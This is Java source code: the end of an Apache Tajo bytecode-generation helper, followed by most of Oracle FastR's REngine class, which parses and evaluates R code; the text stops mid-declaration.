"createTimestamp"; returnType = TimestampDatum.class; paramTypes = new Class[] {long.class}; break; case DATE: convertMethod = "createDate"; returnType = DateDatum.class; paramTypes = new Class[] {int.class}; break; case TIME: convertMethod = "createTime"; returnType = TimeDatum.class; paramTypes = new Class[] {long.class}; break; case INTERVAL: case PROTOBUF: convertMethod = null; returnType = null; paramTypes = null; break; default: throw new RuntimeException("Unsupported type: " + type); } Label ifNull = new Label(); Label afterAll = new Label(); emitNullityCheck(ifNull); if (convertMethod != null) { invokeStatic(DatumFactory.class, convertMethod, returnType, paramTypes); } methodvisitor.visitJumpInsn(Opcodes.GOTO, afterAll); methodvisitor.visitLabel(ifNull); pop(type); invokeStatic(NullDatum.class, "get", NullDatum.class, null); methodvisitor.visitLabel(afterAll); if (castToDatum) { methodvisitor.visitTypeInsn(Opcodes.CHECKCAST, TajoGeneratorAdapter.getInternalName(Datum.class)); } } public void pop(org.apache.tajo.type.Type type) { if (getWordSize(type) == 2) { methodvisitor.visitInsn(Opcodes.POP2); } else { methodvisitor.visitInsn(Opcodes.POP); } } public void emitStringValueOfChar() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class), "valueOf", "(C)L" + Type.getInternalName(String.class) + ";"); } public void emitStringValueOfInt4() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class), "valueOf", "(I)L" + Type.getInternalName(String.class) + ";"); } public void emitStringValueOfInt8() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class), "valueOf", "(J)L" + Type.getInternalName(String.class) + ";"); } public void emitStringValueOfFloat4() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class), "valueOf", "(F)L" + Type.getInternalName(String.class) + ";"); } public void emitStringValueOfFloat8() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class), "valueOf", "(D)L" + Type.getInternalName(String.class) + ";"); } public void emitParseInt4() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Integer.class), "parseInt", "(L" + Type.getInternalName(String.class) + ";)I"); } public void emitParseInt8() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Long.class), "parseLong", "(L" + Type.getInternalName(String.class) + ";)J"); } public void emitParseFloat4() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Float.class), "parseFloat", "(L" + Type.getInternalName(String.class) + ";)F"); } public void emitParseFloat8() { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Double.class), "parseDouble", "(L" + Type.getInternalName(String.class) + ";)D"); } public void newArray(final Class clazz) { int typeCode; if (clazz == boolean.class) { typeCode = Opcodes.T_BOOLEAN; } else if (clazz == char.class) { typeCode = Opcodes.T_CHAR; } else if (clazz == byte.class) { typeCode = Opcodes.T_BYTE; } else if (clazz == short.class) { typeCode = Opcodes.T_SHORT; } else if (clazz == int.class) { typeCode = Opcodes.T_INT; } else if (clazz == long.class) { typeCode = Opcodes.T_LONG; } else if (clazz == float.class) { typeCode = Opcodes.T_FLOAT; } else if (clazz == double.class) { typeCode = Opcodes.T_DOUBLE; } else { methodvisitor.visitTypeInsn(Opcodes.ANEWARRAY, getInternalName(clazz)); return; } methodvisitor.visitIntInsn(Opcodes.NEWARRAY, typeCode); } private int nextVarId = 3; private Map<String, Integer> localVariablesMap = new HashMap<>(); public void astore(String name) { if (localVariablesMap.containsKey(name)) { int varId = localVariablesMap.get(name); methodvisitor.visitVarInsn(Opcodes.ASTORE, varId); } else { int varId = nextVarId++; methodvisitor.visitVarInsn(Opcodes.ASTORE, varId); localVariablesMap.put(name, varId); } } public int astore() { int varId = getCurVarIdAndIncrease(); methodvisitor.visitVarInsn(Opcodes.ASTORE, varId); return varId; } public void astore(int varId) { methodvisitor.visitVarInsn(Opcodes.ASTORE, varId); } public void aload(String name) { if (localVariablesMap.containsKey(name)) { int varId = localVariablesMap.get(name); methodvisitor.visitVarInsn(Opcodes.ALOAD, varId); } else { throw new RuntimeException("No such variable name: " + name); } } public void aload(int varId) { methodvisitor.visitVarInsn(Opcodes.ALOAD, varId); } public void dup() { methodvisitor.visitInsn(Opcodes.DUP); } public void pop() { methodvisitor.visitInsn(Opcodes.POP); } public void pop2() { methodvisitor.visitInsn(Opcodes.POP2); } public int istore() { int varId = getCurVarIdAndIncrease(); return istore(varId); } public int istore(int varId) { methodvisitor.visitVarInsn(Opcodes.ISTORE, varId); return varId; } public void iload(int varId) { methodvisitor.visitVarInsn(Opcodes.ILOAD, varId); } private int getCurVarIdAndIncrease() { int varId = nextVarId++; return varId; } public int store(org.apache.tajo.type.Type type) { int varId = nextVarId; nextVarId += TajoGeneratorAdapter.getWordSize(type); switch (type.kind()) { case NULL_TYPE: case BOOLEAN: case CHAR: case INT1: case INT2: case INT4: methodvisitor.visitVarInsn(Opcodes.ISTORE, varId); break; case TIME: case TIMESTAMP: case INT8: methodvisitor.visitVarInsn(Opcodes.LSTORE, varId); break; case FLOAT4: methodvisitor.visitVarInsn(Opcodes.FSTORE, varId); break; case FLOAT8: methodvisitor.visitVarInsn(Opcodes.DSTORE, varId); break; case INTERVAL: case TEXT: methodvisitor.visitVarInsn(Opcodes.ASTORE, varId); break; default: throw new CompilationError("Unknown data type: " + type); } return varId; } public void emitBoxing(EvalCodeGenContext context, org.apache.tajo.type.Type type) { switch (type.kind()) { case CHAR: case TEXT: case INT2: context.invokeStatic(Short.class, "valueOf", Short.class, new Class[]{short.class}); break; case INT4: context.invokeStatic(Integer.class, "valueOf", Integer.class, new Class[]{int.class}); break; case INT8: context.invokeStatic(Long.class, "valueOf", Long.class, new Class[]{long.class}); break; case FLOAT4: context.invokeStatic(Float.class, "valueOf", Float.class, new Class[]{float.class}); break; case FLOAT8: context.invokeStatic(Double.class, "valueOf", Double.class, new Class[]{double.class}); break; default: throw new RuntimeException(type + " is not supported yet"); } } public void emitUnboxing(EvalCodeGenContext context, org.apache.tajo.type.Type type) { switch (type.kind()) { case CHAR: case TEXT: case INT2: context.invokeVirtual(Short.class, "shortValue", short.class, new Class[]{}); break; case INT4: context.invokeVirtual(Integer.class, "intValue", int.class, new Class[]{}); break; case INT8: context.invokeVirtual(Long.class, "longValue", long.class, new Class[]{}); break; case FLOAT4: context.invokeVirtual(Float.class, "floatValue", float.class, new Class[]{}); break; case FLOAT8: context.invokeVirtual(Double.class, "doubleValue", double.class, new Class[]{}); break; default: throw new RuntimeException(type + " is not supported yet"); } } public static interface SwitchCaseGenerator extends TableSwitchGenerator { int size(); int min(); int max(); int key(int index); void generateCase(int index, Label end); void generateDefault(); } public static class SwitchCase implements Comparable<SwitchCase> { private final int index; private final EvalNode thanResult; public SwitchCase(int index, EvalNode thanResult) { this.index = index; this.thanResult = thanResult; } public int key() { return index; } public EvalNode result() { return thanResult; } @Override public int compareTo(SwitchCase o) { return index - o.index; } @Override public boolean equals(Object o) { if (this == o) return true; if (o == null || getClass() != o.getClass()) return false; SwitchCase that = (SwitchCase) o; if (index != that.index) return false; if (thanResult != null ? !thanResult.equals(that.thanResult) : that.thanResult != null) return false; return true; } @Override public int hashCode() { int result = index; result = 31 * result + (thanResult != null ? thanResult.hashCode() : 0); return result; } } }
oracle/fastr
36,113
com.oracle.truffle.r.engine/src/com/oracle/truffle/r/engine/REngine.java
/* * Copyright (c) 2013, 2023, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 3 only, as * published by the Free Software Foundation. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 3 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 3 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package com.oracle.truffle.r.engine; import static com.oracle.truffle.r.runtime.context.FastROptions.LoadProfiles; import java.io.BufferedReader; import java.io.IOException; import java.net.URI; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; import com.oracle.truffle.api.CallTarget; import com.oracle.truffle.api.CompilerAsserts; import com.oracle.truffle.api.CompilerDirectives; import com.oracle.truffle.api.CompilerDirectives.CompilationFinal; import com.oracle.truffle.api.CompilerDirectives.TruffleBoundary; import com.oracle.truffle.api.RootCallTarget; import com.oracle.truffle.api.TruffleLanguage; import com.oracle.truffle.api.dsl.UnsupportedSpecializationException; import com.oracle.truffle.api.frame.Frame; import com.oracle.truffle.api.frame.FrameDescriptor; import com.oracle.truffle.api.frame.MaterializedFrame; import com.oracle.truffle.api.frame.VirtualFrame; import com.oracle.truffle.api.interop.TruffleObject; import com.oracle.truffle.api.nodes.ExecutableNode; import com.oracle.truffle.api.nodes.ExplodeLoop; import com.oracle.truffle.api.nodes.Node; import com.oracle.truffle.api.nodes.RootNode; import com.oracle.truffle.api.profiles.ValueProfile; import com.oracle.truffle.api.source.Source; import com.oracle.truffle.api.source.SourceSection; import com.oracle.truffle.r.common.StartupTiming; import com.oracle.truffle.r.library.graphics.RGraphics; import com.oracle.truffle.r.nodes.RASTBuilder; import com.oracle.truffle.r.nodes.RASTUtils; import com.oracle.truffle.r.nodes.access.AccessArgumentNode; import com.oracle.truffle.r.nodes.access.WriteVariableNode; import com.oracle.truffle.r.nodes.access.variables.ReadVariableNode; import com.oracle.truffle.r.nodes.builtin.RBuiltinPackages; import com.oracle.truffle.r.nodes.control.AbstractBlockNode; import com.oracle.truffle.r.nodes.control.BreakException; import com.oracle.truffle.r.nodes.control.NextException; import com.oracle.truffle.r.nodes.function.CallMatcherNode.CallMatcherGenericNode; import com.oracle.truffle.r.nodes.function.FormalArguments; import com.oracle.truffle.r.nodes.function.FunctionDefinitionNode; import com.oracle.truffle.r.nodes.function.PromiseHelperNode; import com.oracle.truffle.r.nodes.function.RCallerHelper; import com.oracle.truffle.r.nodes.function.SaveArgumentsNode; import com.oracle.truffle.r.nodes.function.call.CallRFunctionNode; import com.oracle.truffle.r.nodes.function.call.RExplicitCallNode; import com.oracle.truffle.r.nodes.function.visibility.GetVisibilityNode; import com.oracle.truffle.r.nodes.function.visibility.SetVisibilityNode; import com.oracle.truffle.r.nodes.instrumentation.RInstrumentation; import com.oracle.truffle.r.runtime.ArgumentsSignature; import com.oracle.truffle.r.runtime.ExitException; import com.oracle.truffle.r.runtime.JumpToTopLevelException; import com.oracle.truffle.r.runtime.RArguments; import com.oracle.truffle.r.runtime.RCaller; import com.oracle.truffle.r.runtime.RError; import com.oracle.truffle.r.runtime.RErrorHandling; import com.oracle.truffle.r.runtime.RInternalError; import com.oracle.truffle.r.runtime.RParserFactory; import com.oracle.truffle.r.runtime.RProfile; import com.oracle.truffle.r.runtime.RRuntime; import com.oracle.truffle.r.runtime.RSource; import com.oracle.truffle.r.runtime.ReturnException; import com.oracle.truffle.r.runtime.RootBodyNode; import com.oracle.truffle.r.runtime.RootWithBody; import com.oracle.truffle.r.runtime.ThreadTimings; import com.oracle.truffle.r.runtime.Utils; import com.oracle.truffle.r.runtime.Utils.DebugExitException; import com.oracle.truffle.r.runtime.context.Engine; import com.oracle.truffle.r.runtime.context.RContext; import com.oracle.truffle.r.runtime.context.TruffleRLanguage; import com.oracle.truffle.r.runtime.data.RArgsValuesAndNames; import com.oracle.truffle.r.runtime.data.RAttributable; import com.oracle.truffle.r.runtime.data.RBaseObject; import com.oracle.truffle.r.runtime.data.RDataFactory; import com.oracle.truffle.r.runtime.data.RExpression; import com.oracle.truffle.r.runtime.data.RFunction; import com.oracle.truffle.r.runtime.data.RNull; import com.oracle.truffle.r.runtime.data.RPairList; import com.oracle.truffle.r.runtime.data.RPromise; import com.oracle.truffle.r.runtime.data.RSymbol; import com.oracle.truffle.r.runtime.data.model.RAbstractVector; import com.oracle.truffle.r.runtime.data.nodes.ShareObjectNode; import com.oracle.truffle.r.runtime.data.nodes.UnShareObjectNode; import com.oracle.truffle.r.runtime.env.REnvironment; import com.oracle.truffle.r.runtime.env.frame.FrameSlotChangeMonitor; import com.oracle.truffle.r.runtime.interop.Foreign2R; import com.oracle.truffle.r.runtime.interop.R2Foreign; import com.oracle.truffle.r.runtime.nodes.RBaseNode; import com.oracle.truffle.r.runtime.nodes.RNode; import com.oracle.truffle.r.runtime.nodes.RSourceSectionNode; import com.oracle.truffle.r.runtime.nodes.RSyntaxLookup; import com.oracle.truffle.r.runtime.nodes.RSyntaxNode; /** * The engine for the FastR implementation. Handles parsing and evaluation. There is one instance of * this class per {@link RContext}. */ final class REngine implements Engine, Engine.Timings { /** * The system time when this engine was started. */ @CompilationFinal private long startTime; /** * The accumulated time spent by child processes on behalf of this engine. */ private long[] childTimes; /** * The {@link RContext} that this engine is associated with (1-1). */ private final RContext context; /** * The unique frame for the global environment for this engine. */ @CompilationFinal private MaterializedFrame globalFrame; /** * A temporary mechanism for suppressing warnings while evaluating the system profile, until the * proper mechanism is understood. */ private boolean suppressWarnings; @CompilationFinal private RSyntaxNode replPrintCallNode; private REngine(RContext context) { this.context = context; this.childTimes = new long[]{0, 0}; } static REngine create(RContext context) { return new REngine(context); } @Override public void activate(REnvironment.ContextStateImpl stateREnvironment) { RInstrumentation.activate(context); this.globalFrame = stateREnvironment.getGlobalFrame(); this.startTime = System.nanoTime(); if (context.getKind() == RContext.ContextKind.SHARE_NOTHING) { initializeNonShared(); } context.stateRNG.initializeDotRandomSeed(context); initReplPrintSyntaxCallNode(); } @Override public void deactivate() { RGraphics.dispose(context); } private void initializeNonShared() { suppressWarnings = true; MaterializedFrame baseFrame = RRuntime.createNonFunctionFrame("base"); REnvironment.baseInitialize(baseFrame, globalFrame); context.getStateRFFI().initializeVariables(context); RBuiltinPackages.loadBase(context, baseFrame); RGraphics.initialize(context); if (context.getOption(LoadProfiles)) { StartupTiming.timestamp("Before Profiles Loaded"); /* * eval the system/site/user profiles. Experimentally GnuR does not report warnings * during system profile evaluation, but does for the site/user profiles. */ Source systemProfile = RProfile.systemProfile(context); try { parseAndEval(systemProfile, baseFrame, false); } catch (ParseException e) { throw new RInternalError(e, "error while parsing system profile from %s", systemProfile.getName()); } checkAndRunStartupShutdownFunction(".OptRequireMethods", ".OptRequireMethods()"); suppressWarnings = false; Source siteProfile = context.stateRProfile.siteProfile(); if (siteProfile != null) { try { parseAndEval(siteProfile, baseFrame, false); } catch (ParseException e) { throw new RInternalError(e, "error while parsing site profile from %s", siteProfile.getName()); } } Source userProfile = context.stateRProfile.userProfile(); if (userProfile != null) { try { parseAndEval(userProfile, globalFrame, false); } catch (ParseException e) { throw new RInternalError(e, "error while parsing user profile from %s", userProfile.getName()); } } if (context.getStartParams().restore()) { // call sys.load.image(".RData", RCmdOption.QUIET checkAndRunStartupShutdownFunction("sys.load.image", "sys.load.image('.RData'," + (context.getStartParams().isQuiet() ? "TRUE" : "FALSE") + ')'); } checkAndRunStartupShutdownFunction(".First", ".First()"); checkAndRunStartupShutdownFunction(".First.sys", ".First.sys()"); StartupTiming.timestamp("After Profiles Loaded"); } } @Override public void checkAndRunStartupShutdownFunction(String name, String code) { // sanity check: code should be invocation of the function, so it should contain // "{name}(some-args)" assert code.contains("(") && code.contains(name); Object func = REnvironment.globalEnv().findFunction(name); if (func != null) { // Should this print the result? try { parseAndEval(RSource.fromTextInternal(code, RSource.Internal.STARTUP_SHUTDOWN), globalFrame, false); } catch (ParseException e) { throw new RInternalError(e, "error while parsing startup function"); } } } @Override public Timings getTimings() { return this; } @Override public MaterializedFrame getGlobalFrame() { return globalFrame; } @Override public long elapsedTimeInNanos() { return System.nanoTime() - startTime; } @Override public long[] childTimesInNanos() { return childTimes; } @Override public long[] userSysTimeInNanos() { return ThreadTimings.userSysTimeInNanos(); } @Override public Object parseAndEval(Source source, MaterializedFrame frame, boolean printResult) throws ParseException { List<RSyntaxNode> list = parseSource(source); try { Object lastValue = RNull.instance; for (RSyntaxNode node : list) { RootCallTarget callTarget = doMakeCallTarget(node.asRNode(), RSource.Internal.REPL_WRAPPER.string, printResult, true); lastValue = callTarget.call(frame); } return lastValue; } catch (ReturnException ex) { return ex.getResult(); } catch (DebugExitException | JumpToTopLevelException | ExitException e) { throw e; } catch (RError e) { // RError prints the correct result on the console during construction return null; } catch (UnsupportedSpecializationException use) { String message = "FastR internal error: Unsupported specialization in node " + use.getNode().getClass().getSimpleName() + " - supplied values: " + Arrays.asList(use.getSuppliedValues()).stream().map(v -> v == null ? "null" : v.getClass().getSimpleName()).collect(Collectors.toList()); context.getConsole().printErrorln(message); RInternalError.reportError(use); return null; } catch (Throwable t) { context.getConsole().printErrorln("FastR internal error: " + t.getMessage()); RInternalError.reportError(t); return null; } } private List<RSyntaxNode> parseSource(Source source) throws ParseException { RParserFactory.Parser parser = RParserFactory.getParser(); return parser.script(source, new RASTBuilder(true), context.getLanguage()); } @Override public ParsedExpression parse(Source source, boolean keepSource) throws ParseException { RParserFactory.Parser parser = RParserFactory.getParser(); RASTBuilder builder = new RASTBuilder(true); List<RSyntaxNode> script = parser.script(source, builder, context.getLanguage()); Object[] data = new Object[script.size()]; for (int i = 0; i < script.size(); i++) { data[i] = RASTUtils.createLanguageElement(script.get(i)); } return new ParsedExpression(RDataFactory.createExpression(data), builder.getParseData()); } @Override public CallTarget parseToCallTarget(Source source, MaterializedFrame executionFrame) throws ParseException { if (source.getPath() != null && !source.isInteractive()) { // Use RScript semantics (delay syntax errors) for non-interactive sources from file return createRScriptRoot(source, executionFrame).getCallTarget(); } else if (source == Engine.GET_CONTEXT) { /* * The "get context" operations should be executed with as little influence on the * actual engine as possible, therefore this special case takes care of it explicitly. */ return new RootNode(context.getLanguage()) { @Override public SourceSection getSourceSection() { return source.createUnavailableSection(); } @Override public Object execute(VirtualFrame frame) { return context.getEnv().asGuestValue(context); } }.getCallTarget(); } else { List<RSyntaxNode> statements = parseSource(source); EngineRootNode rootNode = EngineRootNode.createEngineRoot(this, context, statements, createSourceSection(source, statements), executionFrame, false); return rootNode.getCallTarget(); } } @Override public CallTarget parseToCallTargetWithArguments(Source source, List<String> argumentNames) throws ParseException { // We create an artificial RFunction, whose body will be the the statement or statements // wrapped in a block node. The function will take the given arguments and will be executed // from an artificial RootNode via the RExplicitCallNode // Body List<RSyntaxNode> statements = parseSource(source); RNode[] statementsAsNode = new RNode[statements.size()]; for (int i = 0; i < statementsAsNode.length; i++) { statementsAsNode[i] = statements.get(i).asRNode(); } RBaseNode body; if (statementsAsNode.length == 1) { body = statementsAsNode[0]; } else { body = AbstractBlockNode.create(RSourceSectionNode.INTERNAL, RSyntaxLookup.createDummyLookup(RSourceSectionNode.INTERNAL, "{", true), statementsAsNode); } // Arguments SaveArgumentsNode saveArguments; FormalArguments formals; AccessArgumentNode[] argAccessNodes = new AccessArgumentNode[argumentNames.size()]; RNode[] init = new RNode[argumentNames.size()]; for (int i = 0; i < argAccessNodes.length; i++) { AccessArgumentNode accessArg = AccessArgumentNode.create(i); argAccessNodes[i] = accessArg; String argName = argumentNames.get(i); init[i] = WriteVariableNode.createArgSave(argName, accessArg); } saveArguments = new SaveArgumentsNode(init); formals = FormalArguments.createForFunction(new RNode[argumentNames.size()], ArgumentsSignature.get(argumentNames.toArray(new String[0]))); for (AccessArgumentNode access : argAccessNodes) { access.setFormals(formals); } // Create RFunction FrameDescriptor descriptor = FrameSlotChangeMonitor.createFunctionFrameDescriptor("<as.function.default>"); FrameSlotChangeMonitor.initializeEnclosingFrame(descriptor, REnvironment.globalEnv().getFrame()); TruffleRLanguage rLanguage = RContext.getInstance().getLanguage(); FunctionDefinitionNode rootNode = FunctionDefinitionNode.create(rLanguage, RSyntaxNode.INTERNAL, descriptor, null, saveArguments, (RSyntaxNode) body, formals, "from AsFunction", null); RootCallTarget callTarget = rootNode.getCallTarget(); RFunction fun = RDataFactory.createFunction(RFunction.NO_NAME, RFunction.NO_NAME, callTarget, null, getGlobalFrame()); // Create RootNode that uses RExplicitCallNode to invoke that function RootNode root = new RootNodeWithArgs(rLanguage, fun, getGlobalFrame(), argumentNames.size()); return root.getCallTarget(); } private static final class RootNodeWithArgs extends RootNode { private final RFunction fun; private final MaterializedFrame globalEnv; @Child private RExplicitCallNode callNode = RExplicitCallNode.create(); @Child private R2Foreign r2Foreign = R2Foreign.create(); @Children private Foreign2R[] foreign2R; RootNodeWithArgs(TruffleLanguage<?> language, RFunction fun, MaterializedFrame globalEnv, int argsCount) { super(language); this.fun = fun; this.globalEnv = globalEnv; foreign2R = new Foreign2R[argsCount]; for (int i = 0; i < foreign2R.length; i++) { foreign2R[i] = Foreign2R.create(); } } @ExplodeLoop @Override public Object execute(VirtualFrame frame) { ArgumentsSignature signature = ArgumentsSignature.empty(frame.getArguments().length); Object[] convertedArgs = new Object[foreign2R.length]; for (int i = 0; i < foreign2R.length; i++) { convertedArgs[i] = foreign2R[i].convert(frame.getArguments()[i]); } RArgsValuesAndNames callArgs = new RArgsValuesAndNames(convertedArgs, signature); return r2Foreign.execute(callNode.execute(globalEnv, fun, callArgs, RCaller.topLevel, globalEnv), true); } } @Override public ExecutableNode parseToExecutableNode(Source source) throws ParseException { List<RSyntaxNode> list = parseSource(source); return new ExecutableNodeImpl(context.getLanguage(), list); } private static final class ExecutableNodeImpl extends ExecutableNode { @Child R2Foreign toForeignNode = R2Foreign.create(); @Children final RNode[] statements; private ExecutableNodeImpl(TruffleLanguage<?> language, List<RSyntaxNode> list) { super(language); statements = new RNode[list.size()]; for (int i = 0; i < statements.length; i++) { statements[i] = list.get(i).asRNode(); } } @Override @ExplodeLoop public Object execute(VirtualFrame frame) { if (statements.length == 0) { return RNull.instance; } for (int i = 0; i < statements.length - 1; i++) { statements[i].execute(frame); } return toForeignNode.convert(statements[statements.length - 1].execute(frame)); } } private static SourceSection createSourceSection(Source source, List<RSyntaxNode> statements) { // All statements come from the same "Source" if (statements.isEmpty()) { return source.createSection(0, source.getLength()); } else if (statements.size() == 1) { return statements.get(0).getSourceSection(); } else { Source newSource = statements.get(0).getSourceSection().getSource(); return newSource.createSection(0, statements.get(statements.size() - 1).getSourceSection().getCharEndIndex()); } } private EngineRootNode createRScriptRoot(Source fullSource, MaterializedFrame frame) { URI uri = fullSource.getURI(); String file = fullSource.getPath(); ArrayList<RSyntaxNode> statements = new ArrayList<>(128); try { try (BufferedReader br = new BufferedReader(fullSource.getReader())) { int lineIndex = 1; int startLine = lineIndex; StringBuilder sb = new StringBuilder(); String nextLineInput = br.readLine(); ParseException lastParseException = null; while (true) { String input = nextLineInput; if (input == null) { if (sb.length() != 0) { // end of file, but not end of statement => error statements.add(new SyntaxErrorNode(lastParseException, fullSource.createSection(startLine, 1, sb.length()))); } break; } nextLineInput = br.readLine(); sb.append(input); Source src = Source.newBuilder(RRuntime.R_LANGUAGE_ID, sb.toString(), file + "#" + startLine + "-" + lineIndex).uri(uri).build(); lineIndex++; List<RSyntaxNode> currentStmts = null; try { RParserFactory.Parser parser = RParserFactory.getParser(); currentStmts = parser.statements(src, fullSource, startLine, new RASTBuilder(true), context.getLanguage()); } catch (IncompleteSourceException e) { lastParseException = e; if (nextLineInput != null) { sb.append('\n'); } continue; } catch (ParseException e) { statements.add(new SyntaxErrorNode(e, fullSource.createSection(startLine, 1, sb.length()))); } if (currentStmts != null) { statements.addAll(currentStmts); } // we did not continue on incomplete source exception sb.setLength(0); startLine = lineIndex; } } } catch (IOException ex) { throw new RuntimeException(ex); } return EngineRootNode.createEngineRoot(this, context, statements, createSourceSection(fullSource, statements), frame, true); } @Override @TruffleBoundary public Object eval(RExpression exprs, REnvironment envir, Object callerFrame, RCaller caller, RFunction function) { Object result = RNull.instance; for (int i = 0; i < exprs.getLength(); i++) { Object obj = exprs.getDataAt(i); if (obj instanceof RSymbol) { String identifier = ((RSymbol) obj).getName(); result = ReadVariableNode.lookupAny(identifier, envir.getFrame(), false); caller.setVisibility(true); if (result == null) { throw RError.error(RError.SHOW_CALLER, RError.Message.ARGUMENT_MISSING, identifier); } } else if ((obj instanceof RPairList && ((RPairList) obj).isLanguage())) { result = eval((RPairList) obj, envir, callerFrame, caller, function); } else { result = obj; } } return result; } @Override @TruffleBoundary public Object eval(RPairList expr, REnvironment envir, Object callerFrame, RCaller caller, RFunction function) { assert expr.isLanguage(); return expr.getClosure().eval(envir, callerFrame, caller, function); } @Override public Object evalPromise(RPromise promise) { return PromiseHelperNode.evaluateSlowPath(promise); } @Override public Object eval(RExpression expr, MaterializedFrame frame) { CompilerAsserts.neverPartOfCompilation(); Object result = null; for (int i = 0; i < expr.getLength(); i++) { result = expr.getDataAt(i); if ((result instanceof RPairList && ((RPairList) result).isLanguage())) { RPairList lang = (RPairList) result; result = eval(lang, frame); } } return result; } @Override public Object eval(RPairList expr, MaterializedFrame frame) { assert expr.isLanguage(); CompilerAsserts.neverPartOfCompilation(); return expr.getClosure().eval(frame); } @Override @TruffleBoundary public Object evalFunction(RFunction func, MaterializedFrame frame, RCaller caller, boolean evalPromises, ArgumentsSignature names, Object... args) { assert frame == null || caller != null; MaterializedFrame actualFrame = frame; if (actualFrame == null) { Frame current = Utils.getActualCurrentFrame(); if (current == null || !RArguments.isRFrame(current)) { // special case, e.g. in parser and an error is thrown actualFrame = REnvironment.globalEnv().getFrame(); } else { actualFrame = current.materialize(); } } ArgumentsSignature argsSignature = names == null ? ArgumentsSignature.empty(args.length) : names; RArgsValuesAndNames reorderedArgs = CallMatcherGenericNode.reorderArguments(args, func, argsSignature, RError.NO_CALLER); Object[] newArgs = reorderedArgs.getArguments(); if (evalPromises) { for (int i = 0; i < newArgs.length; i++) { Object arg = newArgs[i]; if (arg instanceof RPromise) { newArgs[i] = PromiseHelperNode.evaluateSlowPath((RPromise) arg); } } } RCaller rCaller = caller == null ? RCaller.create(actualFrame, RCallerHelper.createFromArguments(func, new RArgsValuesAndNames(args, argsSignature))) : caller; return CallRFunctionNode.executeSlowpath(func, rCaller, actualFrame, newArgs, reorderedArgs.getSignature(), null); } @Override public RootCallTarget makePromiseCallTarget(RNode body, String funName) { return doMakeCallTarget(body, funName, false, false); } /** * Creates an anonymous function, with no arguments to evaluate {@code body}, optionally * printing any result. The {@code callTarget} expects exactly one argument: the {@code frame} * that the body should be executed in. */ @TruffleBoundary RootCallTarget doMakeCallTarget(RNode body, String description, boolean printResult, boolean topLevel) { return new AnonymousRootNode(this, body, description, printResult, topLevel).getCallTarget(); } /** * An instance of this node is called with the intention to have its execution leave a footprint * behind in a specific frame/environment, e.g., during library loading, commands from the * shell, or R's {@code eval} and its friends. The call target must be invoked with one * argument, namely the {@link Frame} to be side-effected. Execution will then proceed in the * context of that frame. Note that passing only this one frame argument, strictly spoken, * violates the frame layout as set forth in {@link RArguments}. This is for internal use only. */ private static final class AnonymousRootNode extends RootNode implements RootWithBody { private final ValueProfile frameTypeProfile = ValueProfile.createClassProfile(); private final String description; private final boolean printResult; private final boolean topLevel; private final boolean suppressWarnings; @Child private RootBodyNode body; @Child private GetVisibilityNode visibility = GetVisibilityNode.create(); @Child private SetVisibilityNode setVisibility = SetVisibilityNode.create(); protected AnonymousRootNode(REngine engine, RNode body, String description, boolean printResult, boolean topLevel) { super(engine.context.getLanguage()); this.suppressWarnings = engine.suppressWarnings; this.body = new AnonymousBodyNode(body); this.description = description; this.printResult = printResult; this.topLevel = topLevel; } @Override public SourceSection getSourceSection() { return getBody().getSourceSection(); } @Override @TruffleBoundary public boolean isInternal() { return RSyntaxNode.isInternal(getBody().getLazySourceSection()); } private VirtualFrame prepareFrame(VirtualFrame frame) { return (MaterializedFrame) frameTypeProfile.profile(frame.getArguments()[0]); } @Override public Object execute(VirtualFrame frame) { assert frame.getArguments().length == 1; VirtualFrame vf = prepareFrame(frame); Object result = null; try { result = body.visibleExecute(vf); assert checkResult(result); if (printResult && result != null) { assert topLevel; if (visibility.execute(vf)) { printResultImpl(RContext.getInstance(this), result); } } if (topLevel) { RErrorHandling.printWarnings(suppressWarnings); } setVisibility.executeEndOfFunction(vf); } catch (RError e) { CompilerDirectives.transferToInterpreter(); throw e; } catch (ReturnException ex) { CompilerDirectives.transferToInterpreter(); // condition handling can cause a "return" that needs to skip over this call throw ex; } catch (BreakException | NextException cfe) { if (topLevel) { CompilerDirectives.transferToInterpreter(); throw RError.error(RError.SHOW_CALLER2, RError.Message.NO_LOOP_FOR_BREAK_NEXT); } else { // there can be an outer loop throw cfe; } } catch (DebugExitException | JumpToTopLevelException | ExitException e) { CompilerDirectives.transferToInterpreter(); throw e; } catch (Throwable e) { CompilerDirectives.transferToInterpreter(); if (e instanceof Error) { throw (Error) e; } else if (e instanceof RuntimeException) { throw (RuntimeException) e; } else { assert false : "unexpected exception: " + e; } } return result; } @Override public String getName() { return description; } @Override public String toString() { return description; } @Override public boolean isCloningAllowed() { return false; } @Override public RSyntaxNode getBody() { return body.getBody().asRSyntaxNode(); } } private static final class AnonymousBodyNode extends Node implements RootBodyNode { @Child private RNode body; AnonymousBodyNode(RNode body) { this.body = body; } @Override public Object visibleExecute(VirtualFrame frame) { return body.visibleExecute(frame); } @Override public SourceSection getSourceSection() { return body.getSourceSection(); } @Override public RNode getBody() { return body; } } @TruffleBoundary private static boolean checkResult(Object result) { if (result instanceof RAbstractVector) { return RAbstractVector.verifyVector((RAbstractVector) result); } return true; } @Override public void printResult(RContext ctx, Object originalResult) { printResultImpl(ctx, originalResult); } @TruffleBoundary static 